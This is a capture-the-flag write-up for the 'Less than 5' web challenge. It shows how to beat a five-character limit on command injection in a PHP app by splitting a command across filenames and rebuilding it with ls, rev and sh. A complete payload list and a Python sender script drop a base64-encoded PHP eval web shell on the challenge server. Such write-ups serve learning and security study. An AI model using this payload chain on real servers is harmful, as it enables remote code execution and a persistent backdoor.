Rating: 5.0

# Web: Less than 5

![image](https://user-images.githubusercontent.com/74207547/164990551-4ab3d77a-363c-400e-932f-6063131ebac4.png)

## Website:

![image](https://user-images.githubusercontent.com/74207547/164990589-4978a78f-0952-46e6-ae9f-36a25ec5398a.png)

There is a blank white page. Let's test parameters from challenge description - `cmd` and `reset`

![image](https://user-images.githubusercontent.com/74207547/164990694-7b04edc3-8752-449b-b88e-620366e2f8f6.png)

![image](https://user-images.githubusercontent.com/74207547/164990699-6d901926-4fae-4b53-9b27-8c2214586ff2.png)

We don't get any output from that. Maybe we should search for some **edge cases** to see how app behaves.

![image](https://user-images.githubusercontent.com/74207547/164991052-8d48fafe-25ec-477c-b6d3-91b84153ce6e.png)

**Null byte** works as always in php scritps. Now we can check how length control is being handled.

![image](https://user-images.githubusercontent.com/74207547/164991027-ddf10e53-b2a7-4f43-8636-5ff3683febb1.png)
![image](https://user-images.githubusercontent.com/74207547/164990967-bedaee60-a230-4ff9-a7ac-8adf3d604add.png)

Input build of more than 5 characters is **not going throught exec function.**

## Fight with input length:

At first I thought the challenge was about simple command injection.
I tried using `*`, `>` to read flag or index.php but didn't get anything.
The length of 5 was too small to get any progress there.
The only thing that I acomplished was creating files with short names and reading them.
This led me to **executing ls and reading the output.**
![image](https://user-images.githubusercontent.com/74207547/164991334-687b6b23-0897-4d13-8acf-3a83715c427d.png)
![image](https://user-images.githubusercontent.com/74207547/164991343-4fd447ab-f0e9-4e1d-bfce-008700baad4b.png)

That's something. At that moment I knew the challenge is about creating payload from multiple files.
It is also said in challenge description that files are being removed every 2 mins so keep that in mind.

## Research:

After feeling a bit helpless I started to google for **short php** payloads. I stumbled upon few interesting articles.
* [blog.spacepatroldelta.com](https://blog.spacepatroldelta.com/a?ID=01800-96c1d853-a6ab-4a27-b2c5-157e586418d3)
* [blog.csdn.net/](https://blog.csdn.net/nzjdsds/article/details/102940762)

In above articles they are basically spliting the command `echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php` in multiple files.
Then they are using `ls -t>0` to sort files by the time they were created and put all of them into one file - `0`.
When that succeed they execute `0` with `sh 0` and the outcome is `1.php` file with php content - **`0`. This line have much more than 5 chars so how they got around it?

![image](https://user-images.githubusercontent.com/74207547/164992694-919a57d3-18a9-4016-ae52-3b5fa4b8ce69.png)

**That's pure magic. How does it even work?**

First we need to understand few commands:
* dir - same as ls
* rev - reverses the input `echo 1234|rev` -> `4321`

So at first they are building a reversed payload. With `*>v` they are calling dir (first file in the folder in alphabetical order) which lists other files and then saves it to `v` file.
Next they uses rev to reverse the payload and move it to another file `0`
Well that works. Pretty crazy way to get around it.

**I found everything that is needed right? Copy, paste, run, didn't work. Unfortunately, it wasn't that simple.**

## Local setup

I created a simple php script that simulates the behavior of the challenge.
```php

```

After a while I knew what didn't work. When building up a `ls -t` from files there is one diffrence between articles and actual challenge. We also have `index.php` in same directory which breaks the whole payload.

![image](https://user-images.githubusercontent.com/74207547/164993458-fca51e60-afec-4289-ac5a-d8cc49fc85ff.png)

Index.php got between the files and whole thing was messed up. I had to find reversed payload that will go after `index.php`

```
>dir
>n\>
>pt-
>l\|
>sl
*>v
>rev
*v>0
```

**Found it!** Below how it works.

![image](https://user-images.githubusercontent.com/74207547/164993612-daf15c12-49a7-4148-a232-0d4e3fd799bc.png)

# Solution:

Simple python script which creates all the files needed and calls `1.php` endpoint to check if it worked.

```python
import requests

url = "http://142.93.209.130:8003/?cmd={0}"

with open("payload.txt","r") as f:
for i in f:
print("[*]" + url.format(i.strip()))
requests.get(url.format(i.strip()))

test = requests.get("http://142.93.209.130:8002/1.php")
if test.status_code == requests.codes.ok:
print("Success!!!")
```

```
payload.txt
>dir
>n\>
>pt-
>l\|
>sl
*>v
>rev
*v>0
>php
>1.\\
>\>\\
>d\\
>\-\\
>\ \\
>4\\
>e6\\
>s\\
>ba\\
>\|\\
>4K\\
>Pz\\
>7\\
>k\\
>XS\\
>x\\
>Fs\\
>V\\
>dF\\
>0\\
>kX\\
>g\\
>bC\\
>h\\
>XZ\\
>Z\\
>Ag\\
>H\\
>wa\\
>9\\
>PD\\
>\}\\
>FS\\
>I\\
>\{\\
>$\\
>ho\\
>ec\\
sh 0
sh n
```
![image](https://user-images.githubusercontent.com/74207547/164993848-6d436385-4934-4bb7-8873-755b58b3939b.png)
![image](https://user-images.githubusercontent.com/74207547/164993863-0feef127-dbce-4cab-ae6f-966020a5c176.png)

## FLAG: ictf{5ch4r5_4re_3n0ugh_bd903}

Original writeup (https://github.com/Dom0nS/ctf/blob/main/CTF_writeups/Incognito-ctf-2022/less_than_5.md).